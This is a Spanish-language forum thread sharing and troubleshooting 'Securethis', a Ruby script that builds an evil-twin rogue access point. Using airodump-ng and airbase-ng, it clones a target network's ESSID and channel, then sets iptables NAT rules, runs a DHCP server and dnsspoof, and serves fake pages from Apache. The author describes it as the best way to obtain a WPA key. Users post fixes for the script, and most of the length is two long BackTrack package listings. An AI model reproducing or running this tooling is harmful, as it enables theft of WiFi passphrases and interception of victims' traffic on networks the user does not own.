puts "Elegir una respuesta valida"
    end
  end
end


     if(opt=="6")
puts "1 -Editar los ficheros esenciales al crack"
puts "2 -Editar les ficheros log de apache"
puts "3 -Hacer un Rogue transparente permitiendo que el cliente de la red objetivo pueda navegar en la red"
puts "4 -Hacer un listado de los ficheros y derechos respectivos en dans /var/www"
eleccion=""
     while eleccion!="1" && eleccion!="2" && eleccion!="3"
eleccion=gets.chomp

     if eleccion=="1"
`gedit /etc/dhcp3/dhcpd.conf`
`gedit /root/dns.txt`

     elsif eleccion=="2"
`gedit /var/log/apache2/access.log`
`gedit /var/log/apache2/error.log`

     elsif eleccion=="3"
     puts "Efectuando escaneo de redes. Una vez elegido el objetivo prensar Ctrl+c para seguir adelante"
sleep 5
system ("airodump-ng --encrypt wpa mon0")
     puts "Entrar nombre la red (ESSID)"
essid=""
essid=gets.chomp
$essid=essid

     puts "Entrar numero de canal de la red (CH)"
ch=""
ch=gets.chomp
$ch=ch

     puts "Entrar dirección MAC de la red (BSSID)"
bssid=""
bssid=gets.chomp
$bssid=bssid

     puts "Creación del rogue AP"
sleep 3
system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e airbase-ng -P -C 30 -c #{$ch} -e #{$essid} mon0 &> /dev/null &")
sleep 3
`ifconfig at0 up`
`ifconfig at0 10.0.0.1 netmask 255.255.255.0`
`ifconfig at0 mtu 1400`
`echo > dhcpd.leases`
`iptables --flush`
`iptables --table nat --flush`
`iptables --delete-chain`
`iptables --table nat --delete-chain`
`iptables --table nat --append POSTROUTING --out-interface eth0 -j MASQUERADE`
`iptables --append FORWARD --in-interface at0 -j ACCEPT`
`iptables -t nat -A PREROUTING -p udp -j DNAT --to 192.168.1.1`
     puts "Reglas iptables establecidas, reiniciando dhcp3"
sleep 3
system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e /etc/init.d/dhcp3-server restart &> /dev/null &")
puts "La victima puede ahora navegar en la red; ¡no sean mal@s! :)"
sleep 5

     elsif choix=="4"
     puts "Los ficheros presentes son:"
sleep 3
system ("ls -l /var/www")
    end
  end
end
system ("ruby Securethis.rb")
 


-----------------------------------------------------------------------------------------------------------------------------------------------------
NOTA(S)
  , El mode monitor se activa con el opción 1, si no queréis usar el opción 1 lo hacéis a mano en un shell a parte  con el clásico
Código: [Seleccionar]
sudo airmon-ng start <interfaz>
(http://ompldr.org/vZXpjZw/Selección_027.png)


(http://ompldr.org/vZXpjcQ/Selección_029.png)
Título: Re:Securethis V1.0
Publicado por: Zoymufeo1978 en Agosto 20, 2012, 14:32:24 pm
El script es estupendo, te ahorras mucho trabajo. Gracias.

PD: Ahora que caigo, fileserve ya como que no... ¿Hay manera de conseguir los archivos para poderlos modificar a nuestro antojo? Muchas gracias de nuevo.
Título: Re:Securethis V1.0
Publicado por: kcdtv en Agosto 20, 2012, 14:39:07 pm
Bienvenido en el foro  :)
Gracias por advertir de este problema... desgraciadamente no tengo el fichero.
Voy a mandar un mail a koala para advertirlo y a ver si tiene un backup.
Título: Re:Securethis V1.0
Publicado por: Zoymufeo1978 en Agosto 20, 2012, 23:02:46 pm
Gracias. Hacía tiempo que me inscribí en el foro pero desafortunadamente, no he contribuido mucho en él. Estaré atento para ver esos ficheros. Un saludo.
Título: Re:Securethis V1.0
Publicado por: koala63 en Agosto 21, 2012, 13:36:41 pm
Hola  :)

Estoy haciendo una version graphiqua del script con GTK pero me va a poner un poco tiempo porque no conosco GTK todavia y estoy apprendido.Voy a poner mas opciones usando reaver y airdrop-ng.Si uno quiere ayudar me y que conoce un poco GTK que me envia un mensaje.

Hasta luego  ;)
Título: Re:Securethis V1.0
Publicado por: kiabras en Marzo 05, 2013, 02:16:38 am
como ejecuto el script en bactrack 5 r3 me sale este error
Código: [Seleccionar]
ruby '/root/Desktop/new file.rb'
/root/Desktop/new file.rb:10: invalid multibyte char (US-ASCII)
/root/Desktop/new file.rb:10: invalid multibyte char (US-ASCII)
/root/Desktop/new file.rb:10: syntax error, unexpected $end, expecting keyword_end
...~~~~~~~~~~~~~~~~ 0 -Instalación de los elementos          ~...
...                               ^
 


edito:solucionado agregando

: # encoding: utf-8


tengo otro problema en una de las la terminales me sale este error
dnsspoof: fopen: No such file or directory
Título: Re:Securethis V1.0
Publicado por: koala63 en Marzo 05, 2013, 14:25:24 pm
hola  ;)


Al principio el programo esta para Unbutu, lo puedes usar con bactrack pero hay que saber el camino exacto de dnspoof en la version de backtrack y ver si todos los elementos estant en el systemo (apt-get...)

Me explico ? :)
Título: Re:Securethis V1.0
Publicado por: kiabras en Marzo 06, 2013, 07:24:30 am
creo que si que habria  que saver la ruta i modificar el script?

la ruta del dnsspoof   es:   /usr/local/sbin

packetes instalados antes de instalar dependecias con el script opcion (0) lista generada con comando sudo dpkg --get-selections


Código: [Seleccionar]
python-fpconst install
python-gconf install
python-gdbm install
python-geoip install
python-glade2 install
python-gmenu install
python-gnome2 install
python-gnomeapplet install
python-gnomecanvas install
python-gnupginterface install
python-gnuplot install
python-gobject install
python-gtk2 install
python-gtksourceview2 install
python-httplib2 install
python-imaging install
python-imaging-tk install
python-impacket install
python-iniparse install
python-ipy install
python-keybinder install
python-launchpadlib install
python-lazr.restfulclient install
python-lazr.uri install
python-ldap install
python-libxml2 install
python-lightblue install
python-lxml install
python-m2crypto install
python-magic install
python-matplotlib install
python-matplotlib-data install
python-memcache install
python-minimal install
python-mysqldb install
python-netaddr install
python-newt install
python-nltk install
python-notify install
python-numpy install
python-oauth install
python-openssl install
python-osmgpsmap install
python-pam install
python-paramiko install
python-pcapy install
python-pefile install
python-pexpect install
python-pkg-resources install
python-problem-report install
python-psyco install
python-psycopg2 install
python-ptrace install
python-pyasn1 install
python-pybonjour install
python-pycryptopp install
python-pycurl install
python-pydot install
python-pyexiv2 install
python-pyicu install
python-pymssql install
python-pyorbit install
python-pyparsing install
python-pypcap install
python-pysnmp-common install
python-pysnmp4 install
python-pysnmp4-apps install
python-pysnmp4-mibs install
python-pyx install
python-qscintilla2 install
python-qt3 install
python-qt4 install
python-qt4-phonon install
python-scapy install
python-scipy install
python-serial install
python-setuptools install
python-simplejson install
python-sip install
python-smartpm install
python-soappy install
python-support install
python-svn install
python-tk install
python-twisted-bin install
python-twisted-core install
python-twisted-web install
python-tz install
python-urwid install
python-usb install
python-utidylib install
python-vte install
python-wadllib install
python-wicd install
python-wxgtk2.8 install
python-wxversion install
python-xdg install
python-xkit install
python-yaml install
python-zope.interface install
python2 install
python2.6 install
python2.6-dev install
python2.6-minimal install
python3 install
python3-minimal install
python3.1 install
python3.1-minimal install
pyxplot install
qt4-qmake install
r8187-driver install
radeontool install
rainbowcrack install
rainbowcrack-mt install
rake install
rar install
rarian-compat install
rdate install
rdesktop install
rdoc1.8 install
rdoc1.9.2 install
readline-common install
readpst install
reaver install
rebind install
rec-studio install
recordmydesktop install
recordmydesktop-bt install
recoverjpeg install
redfang install
reglookup install
reiserfsprogs install
revhosts install
rfidiot install
rfuzz install
ri install
ri1.8 install
ri1.9.2 install
rifiuti install
rifiuti2 install
rinetd install
rkhunter install
rpm-common install
rrdtool install
rsync install
rsyslog install
rtkit install
rtpbreak install
rtpflood install
rtpinject install
rtpinsertsound install
rtpmixsound install
ruby install
ruby-dev install
ruby1.8 install
ruby1.8-dev install
ruby1.9.2 install
ruby1.9.2-dev install
rubygems install
rubygems1.8 install
rubygems1.9.2 install
safecopy install
sakis3g install
samba-common install
samba-common-bin install
samdump install
samdump2 install
sapyto install
sbd install
scalpel install
scapy install
screen install
screen-resolution-extra install
scrollkeeper install
scrounge-ntfs install
sctpscan install
sdparm install
se-toolkit install
securityfocus install
sed install
sendemail install
sensible-utils install
set install
sfuzz install
sgml-base install
sgml-data install
shared-mime-info install
sharutils install
shodan install
sickfuzz install
sidguesser install
siege install
sipcrack install
sipp install
sipsak install
sipscan install
sipvicious install
skipfish install
sleuthkit install
smali install
smap install
smartphone-pentest-framework install
smbclient install
smbexec install
smbfs install
smistrip install
smtp-user-enum install
smtprc install
smtpscan install
sniffjoke install
snmp install
snmp-mibs-downloader install
snmpcheck install
snmpenum install
snort install
snort-common install
snort-common-libraries install
snort-rules-default install
socat install
sox install
spamhole install
spike install
spooftooph install
sqlbrute install
sqldict install
sqlfairy install
sqlite install
sqlite3 install
sqllhf install
sqlmap install
sqlninja install
sqlscan install
sqlsus install
squashfs-tools install
ssidsniff install
ssl-cert install
sslcaudit install
ssldump install
sslh install
sslscan install
sslsniff install
sslstrip install
sslyze install
statsprocessor install
stegdetect install
strace install
stunnel4 install
subterfuge install
subversion install
sucrack install
sudo install
swaks install
swig install
syslinux install
sysv-rc install
sysvinit-utils install
t50 install
tar install
tasksel install
tasksel-data install
tcl8.4 install
tcl8.5 install
tcpd install
tcpdump install
tcpflow install
tcpreplay install
tcpslice install
tcptrace install
tcptraceroute install
tcpxtract install
telnet install
terminator install
termineter install
testdisk install
testssl.sh install
tex-common install
texlive-base install
texlive-binaries install
texlive-common install
texlive-doc-base install
texlive-extra-utils install
texlive-latex-base install
texlive-latex-base-doc install
texlive-luatex install
tftpbruteforce install
thc-ipv6 install
thc-pptp-bruter install
thc-ssl-dos install
thcsslcheck install
theharvester install
time install
tinyproxy install
tk8.4 install
tk8.5 install
tlssled install
tnscmd10g install
tofrodos install
traceroute install
tree install
trixd00r install
truecrack install
truecrypt install
tsconf install
tsocks install
ttf-dejavu install
ttf-dejavu-core install
ttf-dejavu-extra install
ttf-droid install
ttf-dustin install
ttf-freefont install
ttf-liberation install
ttf-lyx install
ttf-mscorefonts-installer install
ttf-symbol-replacement install
ttf-umefont install
ttf-unfonts-core install
twofi install
tzdata install
tzdata-java install
u3-pwn install
u3-tool install
ua-tester install
uberharvest install
ubiquity install
ubiquity-casper install
ubiquity-frontend-debconf install
ubiquity-frontend-gtk install
ubiquity-ubuntu-artwork install
ubuntu-keyring install
ubuntu-serverguide install
ubuntu-system-service install
ucf install
udev install
udisks install
udp.pl install
udptunnel install
ufw install
unetbootin-bt install
unicornscan install
uniscan install
unix-privesc-check install
unrar install
untidy install
unzip install
update-inetd install
update-manager-core install
update-notifier-common install
upower install
upstart install
upx-ucl install
ureadahead install
urlcrazy install
usbmuxd install
usbutils install
user-setup install
util-linux install
uuid install
uuid-runtime install
v86d install
vbetool install
vega install
videojak install
vim install
vim-common install
vim-runtime install
vim-tiny install
vinetto install
vlan install
voiper install
voiphoney install
voiphopper install
voipong install
volafox install
volatility install
vsftpd deinstall
w3af install
w3m install
waffit install
wapiti install
warvox install
watershed install
watobo install
wbar install
wbarconf install
wce install
webscarab install
websecurify install
webshag install
webshells install
webslayer install
websploit install
weevely install
wepcrack install
wfuzz install
wget install
whatweb install
whiptail install
whois install
wicd install
wicd-daemon install
wicd-gtk install
wifihoney install
wifitap install
wifite install
winbind install
windows-binaries install
wine install
wine1.2 install
wine1.2-gecko install
wireless-crda install
wireless-tools install
wireshark install
wol-e install
wordlists install
wpasupplicant install
wstool install
x-ttcidfont-conf install
x11-apps install
x11-common install
x11-session-utils install
x11-utils install
x11-xfs-utils install
x11-xkb-utils install
x11-xserver-utils install
x11proto-core-dev install
x11proto-fixes-dev install
x11proto-input-dev install
x11proto-kb-dev install
x11proto-randr-dev install
x11proto-render-dev install
x11proto-xext-dev install
xauth install
xbase-clients install
xbitmaps install
xdg-utils install
xfonts-base install
xfonts-encodings install
xfonts-utils install
xgps install
xinit install
xkb-data install
xml-core install
xmltoman install
xpdf-common install
xpdf-reader install
xplico install
xplot-xplot.org install
xprobe2 install
xresprobe install
xserver-common install
xserver-xephyr install
xserver-xorg install
xserver-xorg-core install
xserver-xorg-input-all install
xserver-xorg-input-evdev install
xserver-xorg-input-mouse install
xserver-xorg-input-synaptics install
xserver-xorg-input-vmmouse install
xserver-xorg-input-wacom install
xserver-xorg-video-all install
xserver-xorg-video-apm install
xserver-xorg-video-ark install
xserver-xorg-video-ati install
xserver-xorg-video-chips install
xserver-xorg-video-cirrus install
xserver-xorg-video-fbdev install
xserver-xorg-video-geode install
xserver-xorg-video-i128 install
xserver-xorg-video-i740 install
xserver-xorg-video-intel install
xserver-xorg-video-mach64 install
xserver-xorg-video-mga install
xserver-xorg-video-neomagic install
xserver-xorg-video-nouveau install
xserver-xorg-video-nv install
xserver-xorg-video-openchrome install
xserver-xorg-video-r128 install
xserver-xorg-video-radeon install
xserver-xorg-video-rendition install
xserver-xorg-video-s3 install
xserver-xorg-video-s3virge install
xserver-xorg-video-savage install
xserver-xorg-video-siliconmotion install
xserver-xorg-video-sis install
xserver-xorg-video-sisusb install
xserver-xorg-video-tdfx install
xserver-xorg-video-trident install
xserver-xorg-video-tseng install
xserver-xorg-video-v4l install
xserver-xorg-video-vesa install
xserver-xorg-video-vmware install
xserver-xorg-video-voodoo install
xsltproc install
xspy install
xssed install
xsser install
xssfuzz install
xterm install
xtightvncviewer install
xtrace install
xtrans-dev install
xulrunner-1.9.2 install
xutils-dev install
xz-utils install
yelp install
yersinia install
zenity install
zip install
zlib1g install
zlib1g-dev install
zlibc install
root@bt:~#

video ejecucion script opcion 0 bactrack r3

http://telly.com/5BK46S


lista packetes despues de la ejecucion del script opcion ( 0 )

Código: [Seleccionar]
python-glade2 install
python-gmenu install
python-gnome2 install
python-gnomeapplet install
python-gnomecanvas install
python-gnupginterface install
python-gnuplot install
python-gobject install
python-gtk2 install
python-gtksourceview2 install
python-httplib2 install
python-imaging install
python-imaging-tk install
python-impacket install
python-iniparse install
python-ipy install
python-keybinder install
python-launchpadlib install
python-lazr.restfulclient install
python-lazr.uri install
python-ldap install
python-libxml2 install
python-lightblue install
python-lxml install
python-m2crypto install
python-magic install
python-matplotlib install
python-matplotlib-data install
python-memcache install
python-minimal install
python-mysqldb install
python-netaddr install
python-newt install
python-nltk install
python-notify install
python-numpy install
python-oauth install
python-openssl install
python-osmgpsmap install
python-pam install
python-paramiko install
python-pcapy install
python-pefile install
python-pexpect install
python-pkg-resources install
python-problem-report install
python-psyco install
python-psycopg2 install
python-ptrace install
python-pyasn1 install
python-pybonjour install
python-pycryptopp install
python-pycurl install
python-pydot install
python-pyexiv2 install
python-pyicu install
python-pymssql install
python-pyorbit install
python-pyparsing install
python-pypcap install
python-pysnmp-common install
python-pysnmp4 install
python-pysnmp4-apps install
python-pysnmp4-mibs install
python-pyx install
python-qscintilla2 install
python-qt3 install
python-qt4 install
python-qt4-phonon install
python-scapy install
python-scipy install
python-serial install
python-setuptools install
python-simplejson install
python-sip install
python-smartpm install
python-soappy install
python-support install
python-svn install
python-tk install
python-twisted-bin install
python-twisted-core install
python-twisted-web install
python-tz install
python-urwid install
python-usb install
python-utidylib install
python-vte install
python-wadllib install
python-wicd install
python-wxgtk2.8 install
python-wxversion install
python-xdg install
python-xkit install
python-yaml install
python-zope.interface install
python2 install
python2.6 install
python2.6-dev install
python2.6-minimal install
python3 install
python3-minimal install
python3.1 install
python3.1-minimal install
pyxplot install
qt4-qmake install
r8187-driver install
radeontool install
rainbowcrack install
rainbowcrack-mt install
rake install
rar install
rarian-compat install
rdate install
rdesktop install
rdoc1.8 install
rdoc1.9.2 install
readline-common install
readpst install
reaver install
rebind install
rec-studio install
recordmydesktop install
recordmydesktop-bt install
recoverjpeg install
redfang install
reglookup install
reiserfsprogs install
revhosts install
rfidiot install
rfuzz install
ri install
ri1.8 install
ri1.9.2 install
rifiuti install
rifiuti2 install
rinetd install
rkhunter install
rpm-common install
rrdtool install
rsync install
rsyslog install
rtkit install
rtpbreak install
rtpflood install
rtpinject install
rtpinsertsound install
rtpmixsound install
ruby install
ruby-dev install
ruby1.8 install
ruby1.8-dev install
ruby1.9.2 install
ruby1.9.2-dev install
rubygems install
rubygems1.8 install
rubygems1.9.2 install
safecopy install
sakis3g install
samba-common install
samba-common-bin install
samdump install
samdump2 install
sapyto install
sbd install
scalpel install
scapy install
screen install
screen-resolution-extra install
scrollkeeper install
scrounge-ntfs install
sctpscan install
sdparm install
se-toolkit install
securityfocus install
sed install
sendemail install
sensible-utils install
set install
sfuzz install
sgml-base install
sgml-data install
shared-mime-info install
sharutils install
shodan install
sickfuzz install
sidguesser install
siege install
sipcrack install
sipp install
sipsak install
sipscan install
sipvicious install
skipfish install
sleuthkit install
smali install
smap install
smartphone-pentest-framework install
smbclient install
smbexec install
smbfs install
smistrip install
smtp-user-enum install
smtprc install
smtpscan install
sniffjoke install
snmp install
snmp-mibs-downloader install
snmpcheck install
snmpenum install
snort install
snort-common install
snort-common-libraries install
snort-rules-default install
socat install
sox install
spamhole install
spike install
spooftooph install
sqlbrute install
sqldict install
sqlfairy install
sqlite install
sqlite3 install
sqllhf install
sqlmap install
sqlninja install
sqlscan install
sqlsus install
squashfs-tools install
ssidsniff install
ssl-cert install
sslcaudit install
ssldump install
sslh install
sslscan install
sslsniff install
sslstrip install
sslyze install
statsprocessor install
stegdetect install
strace install
stunnel4 install
subterfuge install
subversion install
sucrack install
sudo install
swaks install
swig install
syslinux install
sysv-rc install
sysvinit-utils install
t50 install
tar install
tasksel install
tasksel-data install
tcl8.4 install
tcl8.5 install
tcpd install
tcpdump install
tcpflow install
tcpreplay install
tcpslice install
tcptrace install
tcptraceroute install
tcpxtract install
telnet install
terminator install
termineter install
testdisk install
testssl.sh install
tex-common install
texlive-base install
texlive-binaries install
texlive-common install
texlive-doc-base install
texlive-extra-utils install
texlive-latex-base install
texlive-latex-base-doc install
texlive-luatex install
tftpbruteforce install
thc-ipv6 install
thc-pptp-bruter install
thc-ssl-dos install
thcsslcheck install
theharvester install
time install
tinyproxy install
tk8.4 install
tk8.5 install
tlssled install
tnscmd10g install
tofrodos install
traceroute install
tree install
trixd00r install
truecrack install
truecrypt install
tsconf install
tsocks install
ttf-dejavu install
ttf-dejavu-core install
ttf-dejavu-extra install
ttf-droid install
ttf-dustin install
ttf-freefont install
ttf-liberation install
ttf-lyx install
ttf-mscorefonts-installer install
ttf-symbol-replacement install
ttf-umefont install
ttf-unfonts-core install
twofi install
tzdata install
tzdata-java install
u3-pwn install
u3-tool install
ua-tester install
uberharvest install
ubiquity install
ubiquity-casper install
ubiquity-frontend-debconf install
ubiquity-frontend-gtk install
ubiquity-ubuntu-artwork install
ubuntu-keyring install
ubuntu-serverguide install
ubuntu-system-service install
ucf install
udev install
udisks install
udp.pl install
udptunnel install
ufw install
unetbootin-bt install
unicornscan install
uniscan install
unix-privesc-check install
unrar install
untidy install
unzip install
update-inetd install
update-manager-core install
update-notifier-common install
upower install
upstart install
upx-ucl install
ureadahead install
urlcrazy install
usbmuxd install
usbutils install
user-setup install
util-linux install
uuid install
uuid-runtime install
v86d install
vbetool install
vega install
videojak install
vim install
vim-common install
vim-runtime install
vim-tiny install
vinetto install
vlan install
vlc install
vlc-data install
vlc-nox install
vlc-plugin-pulse install
voiper install
voiphoney install
voiphopper install
voipong install
volafox install
volatility install
vsftpd deinstall
w3af install
w3m install
waffit install
wapiti install
warvox install
watershed install
watobo install
wbar install
wbarconf install
wce install
webscarab install
websecurify install
webshag install
webshells install
webslayer install
websploit install
weevely install
wepcrack install
wfuzz install
wget install
whatweb install
whiptail install
whois install
wicd install
wicd-daemon install
wicd-gtk install
wifihoney install
wifitap install
wifite install
winbind install
windows-binaries install
wine install
wine1.2 install
wine1.2-gecko install
wireless-crda install
wireless-tools install
wireshark install
wol-e install
wordlists install
wpasupplicant install
wstool install
x-ttcidfont-conf install
x11-apps install
x11-common install
x11-session-utils install
x11-utils install
x11-xfs-utils install
x11-xkb-utils install
x11-xserver-utils install
x11proto-core-dev install
x11proto-fixes-dev install
x11proto-input-dev install
x11proto-kb-dev install
x11proto-randr-dev install
x11proto-render-dev install
x11proto-xext-dev install
xauth install
xbase-clients install
xbitmaps install
xdg-utils install
xfonts-base install
xfonts-encodings install
xfonts-utils install
xgps install
xinit install
xkb-data install
xml-core install
xmltoman install
xpdf-common install
xpdf-reader install
xplico install
xplot-xplot.org install
xprobe2 install
xresprobe install
xserver-common install
xserver-xephyr install
xserver-xorg install
xserver-xorg-core install
xserver-xorg-input-all install
xserver-xorg-input-evdev install
xserver-xorg-input-mouse install
xserver-xorg-input-synaptics install
xserver-xorg-input-vmmouse install
xserver-xorg-input-wacom install
xserver-xorg-video-all install
xserver-xorg-video-apm install
xserver-xorg-video-ark install
xserver-xorg-video-ati install
xserver-xorg-video-chips install
xserver-xorg-video-cirrus install
xserver-xorg-video-fbdev install
xserver-xorg-video-geode install
xserver-xorg-video-i128 install
xserver-xorg-video-i740 install
xserver-xorg-video-intel install
xserver-xorg-video-mach64 install
xserver-xorg-video-mga install
xserver-xorg-video-neomagic install
xserver-xorg-video-nouveau install
xserver-xorg-video-nv install
xserver-xorg-video-openchrome install
xserver-xorg-video-r128 install
xserver-xorg-video-radeon install
xserver-xorg-video-rendition install
xserver-xorg-video-s3 install
xserver-xorg-video-s3virge install
xserver-xorg-video-savage install
xserver-xorg-video-siliconmotion install
xserver-xorg-video-sis install
xserver-xorg-video-sisusb install
xserver-xorg-video-tdfx install
xserver-xorg-video-trident install
xserver-xorg-video-tseng install
xserver-xorg-video-v4l install
xserver-xorg-video-vesa install
xserver-xorg-video-vmware install
xserver-xorg-video-voodoo install
xsltproc install
xspy install
xssed install
xsser install
xssfuzz install
xterm install
xtightvncviewer install
xtrace install
xtrans-dev install
xulrunner-1.9.2 install
xutils-dev install
xz-utils install
yelp install
yersinia install
zenity install
zip install
zlib1g install
zlib1g-dev install
zlibc install
root@bt:~#





gracias por el script

subiendo video ejecucion script opcion 4
Título: Re:Securethis V1.0
Publicado por: koala63 en Marzo 06, 2013, 11:15:18 am
Hola  ;)


Para hacer mas:


1-  si quieres instalar las dépendencias mas rapido, puedes modificar el tiempo de esperar entre 2 actionnes, por eso hay que escribir el tiempo que quieres despuès

Código: [Seleccionar]
sleep XX

Por ejemplo aqui es sleep 90

Código: [Seleccionar]
system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e apt-get install wireshark &> /dev/null &")
      sleep 90
system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e sudo apt-get install dhcp3-server &> /dev/null &")
      sleep 90

El tiempo depende de la red que usas y de la puissancia de tu ordinador.


2-  La gente que usa solamente unbutu puede cambiar esta linea:
Código: [Seleccionar]
system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e apt-get install libapache2-mod-php5 &> /dev/null &")
Con esa:
Código: [Seleccionar]
system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e apt-get install apache2 php5 mysql-server libapache2-mod-php5 php5-mysql &> /dev/null &")

3- No soy seguro pero me parece que una de las dependancias de wireshark ha cambiado desde que he puesto el script aqui.Si teneis problemos con wireshark, mira aqui, dicen como areglar lo:

http://www.linuxtrack.com/t1017-Tuto-corriger-le-bug-wireshark-error-while-loading-shared-libraries-libwsutil-so-0-cannot-open-shared-object-file-No-such-file-or-directory.htm


Por la opcion 4 tienes hay que checkear que las falsas paginas de red estan en /var/www con los derectos correcto y no olvidar el mas importante para la rogue AP, el dhcp.conf.
Usando dnsspoof hay que mirar tambien el dns.txt.
Título: Re:Securethis V1.0
Publicado por: kcdtv en Marzo 06, 2013, 11:55:37 am
Muy buenas koala, que alegría verte por aquí  :)
"Shame on me!" por no haber puesto antes chincheta a este topic  ::)
Securethis!  ;)

Título: Re:Securethis V1.0
Publicado por: kiabras en Marzo 06, 2013, 14:23:54 pm
el error del apache lo e solucionado como as dicho
Código: [Seleccionar]
system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e apt-get install apache2 php5 mysql-server libapache2-mod-php5 php5-mysql &> /dev/null &")
Wireshark no e tenido problemas

lo que no se cambiar es el directorio  en el script cambio esta linea  dnsspoof -i at0 -f /root/dns.txt     por esta dnsspoof -i at0 -f /etc/hosts en la consola me pone esto No such file or directory.
en cambio abro una consola i pongo  dnsspoof -i wlan0 /etc/hosts funciona que estoi haciendo mal?

solucionado me havia dejado sin modificar la primera linea de dnsspoof . haora me pasa lo mismo con dhcp server
este es el error que me sale haora
http://subefotos.com/ver/?f9e609fce75176692d504d5025e5b377o.png

si intento conectarme desde otro pc me pone enabled ip adres. otra cosa que pasa es que el essid me cambia todo el rato

dhcpd solucionado con esta configuracion tengo que provar de conectar algun pc pero la consola pone ok me queda resolver lo de los essis aleatorios help

Código: [Seleccionar]
#
# Sample configuration file for ISC dhcpd for Debian
#
# Attention: If /etc/ltsp/dhcpd.conf exists, that will be used as
# configuration file instead of this file.
#
# $Id: dhcpd.conf,v 1.1.1.1 2002/05/21 00:07:44 peloy Exp $
#

# The ddns-updates-style parameter controls whether or not the server will
# attempt to do a DNS update when a lease is confirmed. We default to the
# behavior of the version 2 packages ('none', since DHCP v2 didn't
# have support for DDNS.)
ddns-update-style none;

# option definitions common to all supported networks...
#option domain-name "example.org";
option domain-name-servers ns1.example.org, ns2.example.org;

#default-lease-time 600;
#max-lease-time 7200;

# If this DHCP server is the official DHCP server for the local
# network, the authoritative directive should be uncommented.
#authoritative;

# Use this to send dhcp log messages to a different log file (you also
# have to hack syslog.conf to complete the redirection).
log-facility local7;

# No service will be given on this subnet, but declaring it helps the
# DHCP server to understand the network topology.

#subnet 10.152.187.0 netmask 255.255.255.0 {
#}

# This is a very basic subnet declaration.

#subnet 10.254.239.0 netmask 255.255.255.224 {
#  range 10.254.239.10 10.254.239.20;
#  option routers rtr-239-0-1.example.org, rtr-239-0-2.example.org;
#}

# This declaration allows BOOTP clients to get dynamic addresses,
# which we don't really recommend.

#subnet 10.254.239.32 netmask 255.255.255.224 {
#  range dynamic-bootp 10.254.239.40 10.254.239.60;
#  option broadcast-address 10.254.239.31;
#  option routers rtr-239-32-1.example.org;
#}

# A slightly different configuration for an internal subnet.
subnet 10.0.0.0 netmask 255.255.255.224 {
range 10.0.0.1 10.0.0.30;
option domain-name-servers ns1.internal.example.org;
option domain-name "internal.example.org";
option routers 10.5.5.1;
option broadcast-address 10.0.0.0;
default-lease-time 600;
max-lease-time 7200;
}

# Hosts which require special configuration options can be listed in
# host statements.   If no address is specified, the address will be
# allocated dynamically (if possible), but the host-specific information
# will still come from the host declaration.

#host passacaglia {
#  hardware ethernet 0:0:c0:5d:bd:95;
#  filename "vmunix.passacaglia";
#  server-name "toccata.fugue.com";
#}

# Fixed IP addresses can also be specified for hosts.   These addresses
# should not also be listed as being available for dynamic assignment.
# Hosts for which fixed IP addresses have been specified can boot using
# BOOTP or DHCP.   Hosts for which no fixed address is specified can only
# be booted with DHCP, unless there is an address range on the subnet
# to which a BOOTP client is connected which has the dynamic-bootp flag
# set.
#host fantasia {
#  hardware ethernet 08:00:07:26:c0:a5;
#  fixed-address fantasia.fugue.com;
#}

# You can declare a class of clients and then do address allocation
# based on that.   The example below shows a case where all clients
# in a certain class get addresses on the 10.17.224/24 subnet, and all
# other clients get addresses on the 10.0.29/24 subnet.

#class "foo" {
#  match if substring (option vendor-class-identifier, 0, 4) = "SUNW";
#}

#shared-network 224-29 {
#  subnet 10.17.224.0 netmask 255.255.255.0 {
#    option routers rtr-224.example.org;
#  }
#  subnet 10.0.29.0 netmask 255.255.255.0 {
#    option routers rtr-29.example.org;
#  }
#  pool {
#    allow members of "foo";
#    range 10.17.224.10 10.17.224.250;
#  }
#  pool {
#    deny members of "foo";
#    range 10.0.29.10 10.0.29.230;
#  }
#}


el essid se me cambia todo el rato es como si se asociara halas redes que tengo alado i creara un essid aleatorio
Título: Re:Securethis V1.0
Publicado por: kayakista en Marzo 06, 2013, 17:05:58 pm
Hola koala:
Tiene algun tipo de relación con la aplicación de Airssl que genera un ap falso,ettercap,dhcp y supuestamente genera  password de forma automática,exceptuando el uso de comandos
Título: Re:Securethis V1.0
Publicado por: koala63 en Marzo 22, 2013, 13:21:35 pm
Hola a todos  ;)

Y Gracias a Kcdtv por la chincheta tambien  :)


@kiabras

1- Tiennes que mirar bien como se hace la configuracion del servidor DHCP.

Por ejemplo si el DHCP que usas anda y que el pc que se ha puesto en la red tienne una limitation de red y que ve une pahina blanca 404, es un problemo de DNS o de configuracion de at0 (ver IPTABLE en el script).Tiennes que areglar las réglas de IPTABLE del script con tu DHCP, los dos tiennen que estar igual para que todo anda bien.

2- No comprendo bien tu problemo con el essid, puedes hacer un screenshoot?

@kayakista

Hay muchos script en todo internet por hacer rogue AP ahora, pienso que hasta hora es la mejor forma de tener un llave WPA ;).Reaver WPS esta bueno pero no es une solucion magica tambien :)





Título: Re:Securethis V1.0
Publicado por: koala63 en Abril 11, 2013, 22:37:17 pm
Hola  :)

Me estoy aburriendo esta tarde, he re escribido el codigo.

Primero el install.rb

Código: [Seleccionar]
#!/usr/bin/env ruby
# encoding: utf-8

puts "this script will install the dependancies needed for Securethis, just be carreful on the shell ask Y for yes and n for no, the time of the installation depend to your connection speed and the engine of your computer, you can change the time between any installation using nano, gedit or mousepad when you see a sleep line into the script..."
sleep 60
system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e apt-get install dsniff &> /dev/null &")
      sleep 60
system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e apt-get install wireshark &> /dev/null &")
      sleep 90
system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e sudo apt-get install dhcp3-server &> /dev/null &")
      sleep 90
system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e sudo apt-get install apache2 &> /dev/null &")
      sleep 150
system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e apt-get install libapache2-mod-php5 &> /dev/null &")
`sudo a2enmod php5`
`sudo service apache2 restart`
`sudo gem install --no-rdoc --no-ri highline`

Segundo el script "Securethis.rb":

Código: [Seleccionar]
#!/usr/bin/env ruby
# encoding: utf-8

require "rubygems"
require "highline/import"

puts "Make a good choice with airodump and press ctrl+c for next step"
sleep 10
system ("airmon-ng start wlan0")
sleep 5
system ("airodump-ng mon0")

def wepinj
system ("ifconfig")
